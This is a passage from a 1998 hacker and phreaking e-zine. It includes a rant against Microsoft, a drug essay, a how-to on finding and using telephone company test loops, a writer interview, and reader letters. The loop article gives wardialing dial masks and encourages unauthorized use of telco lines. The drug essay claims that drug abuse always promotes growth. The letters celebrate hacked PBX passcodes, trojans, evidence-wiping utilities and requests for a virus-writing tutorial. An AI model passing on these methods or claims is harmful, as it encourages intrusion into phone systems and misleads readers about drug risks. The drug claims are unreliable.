for Mr. Billy Gates? To be honest, I'm not sure why anyone would defend
|
||
Micro$oft and Gates. I also don't know why people are so sympathetic towards
|
||
a wealthy geek that fears close contact with the public. I simply don't
|
||
understand their reasons or "logic" for doing so. In order to put things into
|
||
perspective, I'll give you a comparison to ponder. Billy Gates has more
|
||
personal wealth than the 50 richest Canadians combined. He has more money
|
||
than the countless thousands of citizens in Canada that are living at or below
|
||
the poverty line combined. If he were hypothetically inclined to help them,
|
||
he could virtually eliminate poverty within this entire country (with a current
|
||
population of over 25 million people). Indeed, tiny million dollar donations to
|
||
"charity" on his part are a mere token... a pittance... in comparison to the
|
||
vast amount that he's accumulated. Those that defend Gates and Micro$oft remind
|
||
me of the 17th century English paupers that had nothing and yet they continued
|
||
to support their king. Micro$oft supporters and defenders are like zombies.
|
||
They've been so utterly brainwashed that they know not what they do. In
|
||
essence, they are not responsible for their words or actions. They're so
|
||
ignorant and naive that they actually believe Gates deserves all that he has,
|
||
and more. Again, how much money is enough? Would $100 billion be enough?
|
||
$200 billion? Perhaps $500 billion is just scratching the surface of what is
|
||
considered to be enough. To some people, no sum of money is enough to satisfy
|
||
them and their need for greed.
|
||
|
||
Billy Gates donated some money to Harvard (which is obviously a huge tax
|
||
writeoff), but is that really a legitimate charitable donation? Not in my eyes
|
||
it isn't. Harvard is an ivy league school for rich kids in my opinion. Also,
|
||
Gates has been quoted as saying that he plans to donate more money to charity
|
||
once he "retires" from the business world. That's a pleasant and comforting
|
||
thought. ;) When does Billy plan to resign as the CEO of Micro$oft? At what
|
||
point will he have amassed enough cash for his retirement? What will his
|
||
retirement home look like? Which tropical islands will he purchase for summer
|
||
homes? Just try to imagine it. It's definitely a sickening thought.
|
||
|
||
As for Micro$oft, I'll leave their corrupt practices for another article. I'd
|
||
just like to comment on the greed of that company (some people almost see it
|
||
as an entity). Why is Micro$oft so respected? Why do they generate so much
|
||
support? Why are they defended by Win95 d00ds? Why does the media give them
|
||
any positive press? I feel that Micro$oft is respected and supported by the
|
||
zombies that cannot use software that doesn't have point and click mouse
|
||
support. Basically, they need icons, pulldown menus, drag and drop etc. which
|
||
is exactly what Windoze gives them. They can't use a commandline and need to
|
||
use a GUI driven "operating system" that has the options right on their screen.
|
||
They also rely on Windoze to control their system. Otherwise, they wouldn't
|
||
be able to use a computer at all. Their keyboards just sit there and collect
|
||
dust. The Windoze zombies respect Micro$oft for making their systems so zombie
|
||
friendly...err user friendly. They absolutely love hardware such as Winmodems
|
||
that's made just for Windoze... It's hardware that's been made exclusively for
|
||
them...Windoze d00ds. The zombies also support Micro$oft because they say that
|
||
it's "popular" and "Windoze is the industry standard" and "the quantity of
|
||
software that's available for Win95" etc. Many of them also program in Visual
|
||
Basic since it's by Micro$oft and extremely easy to learn. As for the mass
|
||
media, they've always supported big business. The bigger a company is, the
|
||
better. The larger they are, the more coverage they get. It's just free
|
||
advertising for Micro$oft since their loyal zombie followers won't abandon them
|
||
no matter what. Under no circumstances will the Windoze zombies even try out
|
||
software by another company. It's a sacred rule of the zombie clan. They're
|
||
strictly forbidden within their ranks from switching software. I can still
|
||
vividly remember the masses of zombies rushing into stores to buy Win95 (as many
|
||
copies as they could physically carry) as soon as it was released. That image
|
||
is burned into my mind and will never be forgotten. They literally fought each
|
||
other and greedily grabbed as many shrink wrapped Windoze 95 boxes as they
|
||
possibly could. I'm sure there will be another 'battle of the Windoze zombies'
|
||
once Windoze 98 is finally released. On a side note, it was hilarious to see
|
||
Win98 crash and burn at the Chicago computer convention as Gates and countless
|
||
others watched. That moment was one of the greatest in the history of
|
||
television in my opinion. Billy Gates didn't look surprised in the least, but
|
||
merely embarrassed and perhaps slightly humbled by the experience. However, his
|
||
massive ego is no doubt still intact. He should be ashamed of his inferior
|
||
product and his business corrupt business practices.
|
||
|
||
In conclusion, I'm sure there will be other articles written on Micro$oft in
|
||
future issues of the Damage, INC. Newsletter. My only intention for this
|
||
article was to make people think seriously about greed. Therefore, I chose
|
||
the best and most appropriate example of greed that exists today. Hopefully
|
||
it has informed and enlightened you somewhat.
|
||
|
||
Written by BLACKENED ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
DRUGS DISCUSSION - {DRUGS}
|
||
The Existence of Drugs in Our Culture.
|
||
|
||
Being brought up in today's society, you could easily come to the
|
||
conclusion that there is an illegal drug problem within our nation. Lower
|
||
class people who use drugs and alcohol to escape their pains; kids who do
|
||
anything to get high... Unfortunately what you don't find out about is the
|
||
number of people addicted to prescription drugs. Or the number of times an
|
||
alcoholic father beats his kids. Or perhaps the stock broker who drinks 12
|
||
cups of coffee a day just to get by. Yes.. I would have to say there is a
|
||
problem in our society. But it's not an illegal drug problem. I don't know
|
||
any crack addicts, nor do I know any heroin junkies. But the number of
|
||
alcoholics I know is staggering; as is the number of addicted cigarette
|
||
smokers. Yes, there definitely is a problem.
|
||
The problem occurs because we try to hide from natural processes. We
|
||
try to control our desires. We are made to feel guilty for wanting to get
|
||
high, or drunk. Yet these are animal traits. There are certain flocks
|
||
of birds that know eating fermented berries will cause pleasure, and a
|
||
drunkenness. Every year they will return to the same tree, because inside
|
||
they know that getting inebriated relieves stress. It relaxes the body and
|
||
mind. It is beneficial to them, so that is why they do it. Interestingly,
|
||
some birds don't know when to stop... and will keep eating these alcoholic
|
||
berries until they die from poisoning. There are many other species who also
|
||
seek out ways to get drunk. Man cannot run away from his inner desires. He
|
||
cannot suppress the drive; nor can he label certain items as "narcotics" and
|
||
do everything in his power to obliterate them. Only when we realize *why* we
|
||
do drugs, will we be on our way to understanding their existence in our world.
|
||
Why do we do drugs? That is a very valid question. Essentially, it is
|
||
the desire to alter one's state-of-consciousness. Drugs induce these states
|
||
of consciousness by manipulating, or mimicking neurotransmitter chemicals in
|
||
your brain. The chemicals in your brain determine your state of consciousness.
|
||
This is a very important statement, and I want you to re-read it. Basically,
|
||
whenever you put something in your body, you alter your state of consciousness.
|
||
So altering your state of consciousness is not a new concept to your personality
|
||
at all - eating sugar affects your state of mind. What differs between states
|
||
is the distance you shift from your original state of consciousness to the new
|
||
one. Drugs accelerate your mind to a higher plane. Rather quickly too, that
|
||
is why some people don't enjoy it. Taking drugs is just a means to manipulating
|
||
and directing the focus of your attention. People do drugs for the same reason
|
||
anybody does anything else - because they find it interesting.
|
||
Upon reading this paragraph, I realize I am guilty of something. I have
|
||
been using the word "drugs" too vaguely to convey my thoughts. I am generally
|
||
talking about the benign drugs such as alcohol, marijuana, opium, and tobacco.
|
||
Psychedelic/hallucinogenic drugs are a much more complicated subject. And
|
||
uppers such as cocaine and speed are based more on the nature of addiction.
|
||
To get the most out of this article, re-read the last paragraph now knowing
|
||
specifically which drugs I am talking about.
|
||
Now we have established that people get high because they find it
|
||
interesting. Well, I hate to sound like a 3 year old, but shouldn't we be
|
||
asking "why is it interesting?" Or more specifically, what is interesting
|
||
about altering one's state of consciousness? Well, recall the March 1998
|
||
issue of the Damage, INC. Newsletter. Myself, and group members talked about
|
||
some very interesting aspects of consciousness, such as astral projection, and
|
||
the power of your mind. If you're not familiar with those subjects, perhaps
|
||
you should read, or re-read last month's Newsletter. To continue, drugs are a
|
||
physically oriented method of going into trance. People who abuse drugs such
|
||
as marijuana, alcohol, LSD, psilocybin (magic mushrooms) are a lot of the time
|
||
people who are aware of themselves, and the divine potential within them; but
|
||
unfortunately their inner battle is with laziness. So instead of diligently
|
||
meditating for six months, they take a hit of acid, or smoke a fat joint,
|
||
experiencing a distorted, yet pleasurable version of the same thing.
|
||
This explains why drugs have, and always will exist in our culture. Their
|
||
use, and even abuse always promotes growth and learning within an individual.
|
||
Drugs expand awareness. Drugs help solve problems. Drugs can also help cause
|
||
problems if one is not careful ;). Drugs soothe pain (emotional and physical).
|
||
Drugs can be spiritual. Drugs are also symbol. They are a symbol of man's
|
||
struggle with self-awareness, and thirst for understanding. Some cultures,
|
||
such as the Mayans, believed that the Magic Mushroom was a gift from the gods.
|
||
A gift of awareness to bring peace and enlightenment.
|
||
The story is a lot different today unfortunately. These once sacred
|
||
mushrooms are now considered harmful. By suppressing drugs, we are
|
||
suppressing the utter delight of looking at ourselves in the mirror of
|
||
awareness. The effects have been detrimental; perhaps even devastating. The
|
||
war on drugs is hurting our society every minute it is being enforced; drugs
|
||
are entwined in our lives, whether you are aware of it or not. These drugs
|
||
that have been categorized as "controlled substances" cannot be eradicated,
|
||
nor banned from use. How ironic it is, to note that the drugs are not really
|
||
being controlled at all. In fact, the opposite is occurring. In the drug
|
||
war, it is not the law enforcement who are winning. The only thing they are
|
||
doing is ruining our nation. They kill lots of people in the process of
|
||
controlling drugs. They also waste a lot of well needed tax dollars. Groups
|
||
who inform their audience using propaganda and lies should *not* be groups
|
||
worthy of your trust.
|
||
Another sad fact, is that the drug war is a result of ignorance, and
|
||
corruption. Cannabis was originally made illegal because its potential as
|
||
a fabric was hurting the cotton and timber industries. The big-wigs who
|
||
owned these operations coerced the government into criminalizing marijuana
|
||
because it was a form of hemp. Hemp that can be used to make clothes, paper,
|
||
and to basically replace the disgusting logging companies. Greed reared its
|
||
ugly head, and attempted to wipe out this profit killing plant. They succeeded
|
||
for many decades, but finally Ontario has decided to stop the destruction of
|
||
our planet, and allow industrial hemp to be grown by farmers. This is a step
|
||
in the right direction, but marijuana still remains a controlled substance.
|
||
And while the ignorant enforcement of these archaic laws remains in our society,
|
||
people will travel further and further away from themselves, and what they know
|
||
to be true.
|
||
I genuinely hope people realize this soon. Drugs are an inherent part of
|
||
our nature. They exist as tools to help us understand ourselves and the
|
||
universe.
|
||
|
||
Next month: Blackened discusses decriminalization.
|
||
|
||
Written by The Journalist ù (C)opyright 1998 Damage, INC.
|
||
|
||
|
||
H/P INFORMATION AND NEWS - {H/P}
|
||
Looping the Loop in your area code.
|
||
|
||
This short article on loops is the first that I've submitted to the Damage, INC.
|
||
Newsletter. I hope that you enjoy reading it and find it informative. Since
|
||
loops can be different in each area code, I'm only going to include general
|
||
information. That way it'll apply to the area code that you're in. Basically,
|
||
I'm going to explain the following:
|
||
|
||
[1] What a loop is.
|
||
[2] Why loops are setup by the telco.
|
||
[3] How to detect a loop.
|
||
[4] How to scan and find loops.
|
||
[5] How to use loops.
|
||
|
||
As you can see, only the basics of loops will be covered in this article. If
|
||
you want to examine lists of loops (for any area code) and look for patterns,
|
||
then that might also benefit you. Let's begin the quest for knowledge about
|
||
loops, one of the most interesting tones. Get ready to start looping the loop.
|
||
|
||
Loops are interesting tones that have two ends. One end of a loop is called
|
||
the high end and the other is the low end. (Did you think I was talking about
|
||
Fruit Loops?) :) Loops exist in all area codes. Usually there are many loops
|
||
in each area code. Sometimes there are multiple loops for every exchange.
|
||
Basically, loops are two lines that are connected. Or, if it's easier for you
|
||
to understand, two different phone numbers that have a relationship. Both
|
||
numbers will be in the same local exchange. An example would be 514-555-9996
|
||
and 514-555-9997. If you've ever seen a list of loops, then you already know
|
||
what typical pairs of loops look like. Or, maybe you've read about what a
|
||
cheese box is. If not, read a text file on them and build one. The basic
|
||
example that I gave isn't always how loops are setup though. There isn't always
|
||
just 1 digit separating the high end from the low end. They can be setup in
|
||
literally any configuration. There could be 2, 3, 4, 5, 10 digits between the
|
||
two numbers. Sometimes the span is greater than that to discourage people from
|
||
finding and using the loop. The point is that not all loops are setup the same
|
||
way. The telco owns them and doesn't like it when other people use them. They
|
||
are fairly safe to use though and the telco never really bothers to try to stop
|
||
anyone from using them. :) However, be aware of the fact that Bell can monitor
|
||
their loops and listen in on conversations at any time. So, be careful about
|
||
the types of things you discuss.
|
||
|
||
Loops are setup by the local telco for several reasons. They're used by telco
|
||
workers for testing many different things. One of the main purposes they use
|
||
loops is for testing long distance trunks. By utilizing loops, the telco can
|
||
save time and manpower. They require less lines, less telco workers and the
|
||
loops are always there ready to use for testing. I won't get too technical
|
||
with jargon, but it is important that you know the basics of how loops are used
|
||
by the telco and why they are setup. A Telco linesmen/technician can dial the
|
||
lower number of a loop and a 1000 HZ tone will be emitted at a zero db level.
|
||
He can use a meter to gauge whether or not there are any problems on the line.
|
||
If he needs to do complete testing at several frequencies then he can turn on
|
||
the filter bypass switch. Before there were any loops, trunks had to be tested
|
||
by two techs with one at each end. One tech would send a 1000 HZ test tone
|
||
through and the other would read the volume using a meter. Then he'd send a
|
||
signal back to the first tech to test it. That required too much planning and
|
||
two telco workers were required for testing. Thus, loops were created by
|
||
connecting two lines together as a simple solution for testing and adjusting
|
||
trunks. Due to loops, the trunks can be tested and adjusted by a single tech.
|
||
|
||
I'm not going to explain everything about trunks and repeaters since you can
|
||
read information on them elsewhere and learn. The only other thing that you
|
||
need to know about trunks at this point is that they are tied together by a
|
||
zero loss terminator which connects lines together so that there's no change
|
||
in volume. That's why it's called "zero loss". :) To test a suspect trunk the
|
||
tech dials the loop with his meter connected. Then he dials the other half of
|
||
the loop using a trunk that he knows is good (one that isn't faulty or noisy).
|
||
After that's been completed, he reverses the signal path as described above to
|
||
finish the test. If you wish to learn more about signals, frequencies, carrier
|
||
trunks, transmitters, terminators, filters, switches etc. then I recommend
|
||
obtaining a Bell manual and looking for the technical information that you need.
|
||
|
||
Most loops don't ring when you dial them, which makes the task of detecting them
|
||
fairly easy. You can also detect loops by what you hear after dialing the
|
||
number. It depends on which number you dial. If you're scanning and happen to
|
||
dial the low end, then you'll hear a 1000 HZ tone. If you dial the high end,
|
||
then you will hear nothing. It's silent unless someone else is on the other
|
||
end. So, if someone is using the loop already, then you'll be connected and
|
||
hear them talking. Sometimes you'll hear a large group of people talking to
|
||
each other as loops are often used as an informal 'meeting place'. Don't be
|
||
too surprised if you encounter a private loop party and you're not invited. If
|
||
you're not wanted, then hang up and don't bother them. You can always use the
|
||
loop some other time. You don't want to anger any local phreaks that might be
|
||
using the loop for something important. That should be enough information on
|
||
detecting loops while scanning.
|
||
|
||
You might be wondering just where to begin scanning for these amazing loops.
|
||
In order to make your task of scanning and finding some loops easier, I'm going
|
||
to give you a few tips. Using THC-Scan (no affiliation with my alias) or
|
||
ToneLoc, try entering 555-00XX, 555-11XX, or 555-99XX as a dialing mask. The
|
||
555 represents the exchange of your choice to scan. Usually, loops are found
|
||
in one of those three suffixes. Sometimes, they're the same for each local
|
||
exchange. So, if you find loops in one exchange in say NPA+XXX-99XX then try
|
||
scanning that same range in another exchange. NPA is Numbering Plan Area. It
|
||
is just the area code. The NPA of (514) 123-4567 would be 514. Some people
|
||
use ACN (Area Code Number), but NPA is the proper, accepted term. The exchange
|
||
(or NXX) for that number would be 123. So, now if you see a number such as
|
||
NPA+NXX-XXXX you'll recognize it and understand what it means. :) You may find
|
||
as many as 20+ loops in a single exchange. In a large area code you might find
|
||
50-75 loops. In smaller area codes (with less exchanges in use), there should
|
||
still be about 5-10 loops. If you scan using these methods and can't find any
|
||
loops, try asking a local phreak in your area code for some scanning advice. :)
|
||
|
||
Loops can be quite useful. Just because they're owned by the telco doesn't mean
|
||
that we can't use them. Afterall, they're already there and unused most of the
|
||
time. So, if something isn't being used for anything, then we might as well put
|
||
it to good use for our own purposes. :) There's absolutely no harm in doing
|
||
that. If however the loop is being used for testing though, avoid trying to use
|
||
it. They're usually being used by the telco for testing during the day, so you
|
||
shouldn't attempt to use them during the day (business/working hours). You may
|
||
be wondering how loops are beneficial to you and what to use them for. Well,
|
||
if nothing else it's always good to experiment and learn about the phone system.
|
||
Using loops is a harmless way of doing that. You can also use loops so that you
|
||
remain anonymous by giving someone the number of a loop to call instead of your
|
||
home phone number. Tell them what time to call you, and be waiting for them on
|
||
the loop. Just don't forget that Bell might be listening in. So, they don't
|
||
exactly offer complete anonymity. A good use for loops is for conferences.
|
||
They're almost like big party lines. You can dial and meet new people, or
|
||
arrange meetings with phreaks that you already know. It's a good way to get a
|
||
large group of people together for a conference since people can join it at any
|
||
time. They're a blast and the best 'feature' is that they're totally free. :)
|
||
Loops are toll-free, no charge. Once you become more experienced, you can do
|
||
'advanced tricks' like looping around the world. Or you can hang out, talk with
|
||
cool people (phreaks like me) for hours and it won't cost you a cent. Another
|
||
benefit is that you can meet some very intelligent, knowledgeable people that
|
||
you otherwise wouldn't have. At least, that's been my personal experience.
|
||
Scanning and using loops may be 'illegal' in your area. So, I'm not responsible
|
||
if you're traced and get busted. :) Regardless of that, have some phun and
|
||
happy THC phreaking.
|
||
|
||
I plan to write more articles for the Damage, INC. Newsletter in the future.
|
||
I'm proud of this one and thankful that it was good enough to be published. If
|
||
you have any questions or comments about it, post a message to me on AJFA and
|
||
I'll try to reply as soon as possible.
|
||
|
||
--- Written by THC Phreak. ---
|
||
|
||
|
||
ú - NEWS - ú
|
||
|
||
There's not much news to report this month. However, there is a rather
|
||
important matter concerning the Damage, INC. Newsletter that needs to be
|
||
mentioned. We're overloaded with work, and lacking in time. Therefore, in
|
||
order to complete certain unfinished projects (such as the Damage, INC. FAQ)
|
||
and maintain the quality of our releases, there may not be a May issue of the
|
||
Damage, INC. Newsletter. If the end of May arrives and there isn't an issue
|
||
released, then we'll keep you informed. Even under these circumstances, we
|
||
will still try to release a new issue by the middle of June. As we include
|
||
more information in each issue, do more indepth research, increase the size of
|
||
each issue, etc. it may become impossible to stay "a monthly newsletter". If
|
||
that does happen, you can be assured that we won't just quit and die... So,
|
||
don't start rumours or make any false assumptions about Damage, INC. based
|
||
upon the time span between issues.
|
||
|
||
Written by BLACKENED ú Damage, INC. (C)opyright 1998.
|
||
|
||
|
||
INTERVIEWS AND INTERROGATIONS - {INTERVIEWS}
|
||
An Interview of THC Phreak:
|
||
|
||
This is a recent interview that I conducted with THC Phreak. Since he's a
|
||
Damage, INC. Writer now, I felt that it would be a good idea to interview him
|
||
so that readers would be able to learn a little about him.
|
||
|
||
<B> = BLACKENED
|
||
<THC> = THC Phreak
|
||
|
||
<B> - Introduce yourself to the readers of the Damage, INC. Newsletter.
|
||
|
||
<THC> - My alias is THC Phreak and I'm from the 514 area code... I've been
|
||
into h/p for a number of years... mainly phreaking... and have just started
|
||
to become more actively involved in the scene recently.
|
||
|
||
<B> - What meaning does your alias carry? (Obviously, I already know the
|
||
answer but the majority of these questions are asked for the benefit of the
|
||
readers).
|
||
|
||
<THC> - Okay... THC stands for Trans-tetraHydroCannabinol. It's the chemical
|
||
in marijuana that is responsible for getting you high. :) That's just part
|
||
of it. I chose this alias a long time ago (2-3 years)... because I was toking
|
||
a lot back then and was really interested in phreaking. So, I thought it was a
|
||
perfect match. I started to phreak and was a THC freak. That's the main reason
|
||
why I thought of it, and that's the meaning behind it.
|
||
|
||
<B> - Alright, that's understandable. How did you become interested in
|
||
phreaking?
|
||
|
||
<THC> - Well, that's a really good question... As I said before, I became
|
||
interested in phreaking about 2-3 years ago. I'm trying to remember how that
|
||
happened. The reason why is that I like learning about things and I am
|
||
naturally curious about things that most people ignore. The only answer as
|
||
to how I became interested in it is that I saw some issues of Phrack magazine,
|
||
a few text files on different boxes etc. on some local boards, downloaded and
|
||
read them. After that, I wanted to learn as much about phreaking as I could.
|
||
It took me a little while to get past the 'beige boxing' phase. Once I lost
|
||
interest in the boxing shit, I wanted to start learning about the actual
|
||
telephone system... and how to use it.
|
||
|
||
<B> - Yeah, that's cool man. ;) What magazines other than Phrack do you
|
||
read? Are you interested/involved in hacking?
|
||
|
||
<THC> - I'm more interested in phreaking... and have very little hacking
|
||
experience. Hmmm, I read quite a few magazines... CUD, cDc, THC etc. and
|
||
of course the Damage, INC. Newsletter. :)
|
||
|
||
<B> - Do you think that magazines that have articles submitted by readers
|
||
(such as Phrack for example) are more informative than ones that are written
|
||
almost entirely by the staff/group?
|
||
|
||
<THC> - Overall, yes, I think that they are. Phrack is established, well
|
||
known, very informative and highly regarded... It's thought of as being the
|
||
best h/p magazine around. I'd have to agree and say that it is. I've read
|
||
a few articles in Phrack (and other magazines) that were sent in and published
|
||
that weren't very good though. It's a compromise. Sometimes the ones that
|
||
have a mixture between articles written by the group and readers are just as
|
||
good. :)
|
||
|
||
<B> - That's true. I have respect for Phrack and the various Phrack editors
|
||
that have put it together over the years. While we're on the topic of readers
|
||
contributing articles, how do you think being a Damage, INC. Writer will benefit
|
||
you/readers/the h/p scene?
|
||
|
||
<THC> - I think that the articles I submit to Damage, INC. will help readers
|
||
of the Damage, INC. Newsletter. I feel that by sharing knowledge and
|
||
experiences, that I'll benefit as well... by learning how to write quality
|
||
articles and share what I know. It's been a learning experience in itself.
|
||
|
||
<B> - Personally, I think that by associating with others that are at the
|
||
"same level" of knowledge or greater, one can learn a tremendous amount. Do
|
||
you agree/disagree with that statement?
|
||
|
||
<THC> - I agree with that. When I was a newbie, I learned a lot from some
|
||
of the local phreaks in my area code. I'm still learning though, and try to
|
||
converse with as many phreaks as I can... That is the best way to learn. :)
|
||
People know about different things, so exchanging knowledge and ideas just
|
||
makes sense.
|
||
|
||
<B> - Yeah, that's basically what I've been trying to convey to the readers
|
||
of the Damage, INC. Newsletter. Perhaps I haven't expressed myself clearly
|
||
enough to them yet. Hopefully this interview will get that point across.
|
||
What about the ethics of phreaking? What are your opinions on that?
|
||
|
||
<THC> - I don't think there's anything wrong with exploring. That's what
|
||
phreaking means to me... learning about the telephone system and all that
|
||
it encompasses. There's absolutely nothing wrong, as long as no damage is
|
||
caused by the phreak. What's the harm in wanting to know how things work?
|
||
|
||
<B> - Do you ever explore any systems? Are you interested in learning how
|
||
to hack anything?
|
||
|
||
<THC> - Yes, I have explored systems before... and enjoy experimenting with
|
||
them. I've basically hacked small networks and passcodes for things so far.
|
||
But I am interested in learning more about the art of hacking. Right now
|
||
though, my hacking skills aren't that impressive. :)
|
||
|
||
<B> - Now that you've been in the h/p scene for a few years, what advice would
|
||
you give to newbies?
|
||
|
||
<THC> - I'm not an expert or anything, and don't pretend to be. However, I
|
||
think that newbies should read about things first, and then once they know
|
||
something about it they can experiment using that newly acquired knowledge.
|
||
Newbies should also the difference between good information and bad information.
|
||
What I mean by that is this, some information is real... and the rest is fake.
|
||
I've read some text files that gave wrong information before. They looked as
|
||
if they'd been written by a newbie or a wannabe of some sort. I don't think
|
||
that's very good for the scene.
|
||
|
||
<B> - I agree. It's harmful to the scene, since many people that read it
|
||
will believe the misinformation simply because it's written in a text file.
|
||
There are a few wannabe groups in 519. There always has been. Thankfully, most
|
||
of them didn't last too long. A few died after releasing a few shitty text
|
||
files. ;) One last question, what do you think of h/p groups?
|
||
|
||
<THC> - In my opinion, the active ones are a benefit to the scene. The groups
|
||
that release quality information deserve respect. I now know that it takes
|
||
time to write a good article, and applaud everyone else that writes them on
|
||
a regular basis. :)
|
||
|
||
<B> - Thanks for agreeing to do this interview man. I hope that it has
|
||
enlightened the readers of the Damage, INC. Newsletter and given them some
|
||
things to think about. I'm sure that they've learned a little about you as
|
||
well. ;)
|
||
|
||
<THC> - You're welcome. I was glad to participate and I'll contribute whenever
|
||
I can. It was an enjoyable experience. :)
|
||
|
||
<B> - This concludes another Damage, INC. interview. We plan to interview more
|
||
people in the h/p scene in future issues, so look for them.
|
||
|
||
|
||
LETTERS TO THE EDITOR - {LETTERS}
|
||
More feedback about the Damage, INC. Newsletter:
|
||
|
||
|
||
Date: 6:38 pm Wed Apr 22, 1998 Number : 106 of 111
|
||
From: Dizzy Base : [Damage, INC. Discussion]
|
||
To : Fatal Vision Refer #: 94
|
||
Subj: Re: Damage, INC. Feedback Replies: 1
|
||
Stat: Normal Origin : Local
|
||
|
||
FV> In a earlier message Blackened stated that there is not enough feedback..
|
||
|
||
Here's some feedback:
|
||
|
||
In your interviews with Bill Gates, its not very funny anymore as him being a
|
||
spineless snivelling snothead. Give him some good attributes (wether it be he
|
||
can pick his ass with his pinky, or masturbate in under 10 seconds, I don't
|
||
care. Just something good... :)
|
||
|
||
And in #7 - For some reason, I could only read to the EOF in the first or
|
||
second line of coding in the Trojan. I downloaded the newsletter twice, and
|
||
both times I got no errors in unzipping. Help?
|
||
-------------------------------------------------------------------------------
|
||
|
||
Editor - Dizzy, the interrogations of Billy Gates are meant to be sarcastic,
|
||
humourous, and at the same time an accurate portrayal of Billy's
|
||
character. That's how we view his personality, and many of the
|
||
traits and expressions used are realistic. He is arrogant, greedy,
|
||
wimpy, stubborn, defiant, egotistical, paranoid etc. Also, many
|
||
readers have commented on those interrogations and said they found
|
||
them to be hilarious. Thus, the saga will continue. As I'm sure
|
||
you've noticed, they aren't included in each issue... nor will they
|
||
ever be in every issue. I have yet to play the role of Billy Gates.
|
||
Thus far, other Damage, INC. Members have done that job. We've
|
||
tried not to make them overly "immature", and always make sure we
|
||
mention certain things that are happening at the time with Micro$oft
|
||
and the industry in general. We're going to put more recent incidents
|
||
and events into future interrogations of Gates. Damage, INC. also has
|
||
plans to do mock interrogations of other fat cats and public figures
|
||
in future issue. So, you can look forward to reading those. However,
|
||
if you don't enjoy reading them, then you can skip that section. It's
|
||
your choice, as you are the reader. ;)
|
||
|
||
As for the trojan, the source code includes an EOF character in it.
|
||
Therefore, you must read it using a text editor/viewer. Downloading
|
||
new copies won't solve the "problem" that you're experiencing. It
|
||
has nothing to do with the Pkzip file being corrupt or anything either.
|
||
The character is there to prevent someone from using the DOS TYPE
|
||
command to view the .com file. Of course, now you might not be able
|
||
to read the rest of these comments beyond the EOF marker... again.
|
||
It's unfortunate that you were prevented from reading the rest of the
|
||
Damage, INC. Newsletter Issue #7 due to the use of that single
|
||
character. If you don't figure it out after reading my response to
|
||
your letter, I'll leave you Email.
|
||
|
||
|
||
----- aenima's letter to the editor -----
|
||
|
||
my alias is aenima and i promised to blackened that i would send him feedback
|
||
to the Damage, INC. newsletter. i wanted to post this on foi or call ajfa
|
||
but i have been busy this month and haven't had a chance and foi offline mail
|
||
doesn't work. it will not let me download a copy. so i thought i would make
|
||
a text file instead of posting a message. hope that's ok. :)
|
||
|
||
now for my letter to the editor i would like to start off by saying that
|
||
in my personal opinion i feel it is a great magazine. once distributed
|
||
to more area codes and perhaps setting up a ftp/www site would be benificial
|
||
and create awareness. i am curious as to what area codes it is already
|
||
released to and will do my best to distribute it. my local scene seems to
|
||
enjoy reading it and their is now a constant flow of messages about Damage, INC.
|
||
however, i myself know a little about the group since i have read some bases
|
||
on Freedom Of Information, read the Damage, INC. newsletter, tested some
|
||
Damage, INC. utilities. so i have been trying my hardest to keep users in my
|
||
area code informed about Damage, INC. and they are waiting for this issue.
|
||
|
||
The new section that was added to the Damage, INC. newsletter called
|
||
Drugs Discussion is looking quite promising to me. i am a freqent toker
|
||
and look forward to reading things in that section. maybe even contribute
|
||
a few articles.
|
||
|
||
i have a major suggestion for the source and scripts section. i think its
|
||
great that there are commented source code made by Damage, INC. in the
|
||
newsletter however have you ever thought about going into a little bit of a
|
||
tutorial???
|
||
i know that many people would like to learn how to program in asm to create
|
||
viruses, trojans, and some utilities but are not aware how to start etc. i
|
||
know you suggested that people download HELPPC.ZIP TASM31.ZIP and SR504.ZIP
|
||
but i am not sure exactly how to use that to my advantange. i know some people
|
||
in my area that are pretty much amazed at some of your utilities. and as i
|
||
have said before one of my buddies had a BUST.BAT file and had to use it in
|
||
a tight situation. it did work. and he was very happy with Damage INC. and
|
||
the util that he decided to use. (NUKE v1.00) and i know that NUKEKB.ZIP has
|
||
been very useful to me. :) as i can think of many useful utilities that i
|
||
could program. so it would be nice in an issue to assume that some people
|
||
don't know to much about ASM and PROGRAMMING.
|
||
|
||
i really like the introduction and conclusion that has been done in each
|
||
issue :) some are hilarious as well as the actual newsletter names.
|
||
and statement "for people to identify a theme in every issue" has been
|
||
properly implaced and i can always tell what it is.
|
||
|
||
i enjoyed reading The Journalist's article about "PSYCHIC WARRIORS" i though it
|
||
was really enjoyable, and do believe that could happen. the whole out of body
|
||
placement. Blackie Lawless' articles are very good and informative.
|
||
people in my area code have learned quite a bit from that article. the PBX
|
||
one taught quite a few people in my area code a bit more about pbxs and they
|
||
were able to scan/hack passcodes. and now have working pbx codes. i was quite
|
||
impressed to see this. because there is a real lack of extenders in our area
|
||
code so we have to rely on things like pbxs, and operators etc. :) also i
|
||
enjoy reading Blackened and Shatazar's articles as well. they are really
|
||
informative and make everyone reading them wonder "how much research goes into
|
||
them????" like how much time do you spend reading about the topic. how do
|
||
you decide what topics you are going to do and who does what??? how much
|
||
time in total do you think you guys spend doing the Damage, INC. newsletter?
|
||
|
||
anyways. this concludes my thoughts about the Damage, INC. newsletter if
|
||
you wish to use this then be my guest. that's what it was intended for.
|
||
i wish the best for the group and hope it expands and gets many readers.
|
||
|
||
-- aenima
|
||
-------------------------------------------------------------------------------
|
||
|
||
Editor - Thanks for the feedback man. I always enjoy hearing from our loyal
|
||
readers. ;) Anyways, we're working on improving the distribution
|
||
aspect. Any help that you can provide by distributing the
|
||
Damage, INC. newsletter in your area code is appreciated by us.
|
||
Also, your comment saying that you feel it's a great magazine is
|
||
well taken. Thanks again for the compliment. ;)
|
||
|
||
As for the new Drugs Discussion section, we also feel that it's
|
||
promising and holds potential. We won't to raise awareness in our
|
||
readers in relation to drugs etc. If you want to contribute by
|
||
writing an article on drug experiences or whatever, then that would
|
||
be great. We definitely want to publish more articles that are
|
||
written by our readers... and add a "personal touch". We also want
|
||
to write articles covering drug issues to dispel common myths and
|
||
destroy the misinformation that exists about drugs.
|
||
|
||
Your suggestion for the Source and Scripts section (writing a tutorial)
|
||
is something that we've thought about and discussed within the group.
|
||
I realize that many people don't program in any language, or know much
|
||
about assembly. I've tried to heavily comment the source code, but
|
||
I can understand how it might seem difficult to read/learn. I'll
|
||
definitely think about creating a tutorial for beginning assembly
|
||
programmers. As I've said many times, any and all suggestions will
|
||
be considered. The only restriction at this point is time, in that
|
||
we have many unfinished projects (The Damage, INC. FAQ is one of them)
|
||
that need to be completed first. However, I won't forget about your
|
||
request for a tutorial on asm... In fact, it is something that I've
|
||
wanted to work on for a long time. Many people in this area code
|
||
know very little about assembly, so it's needed.
|
||
|
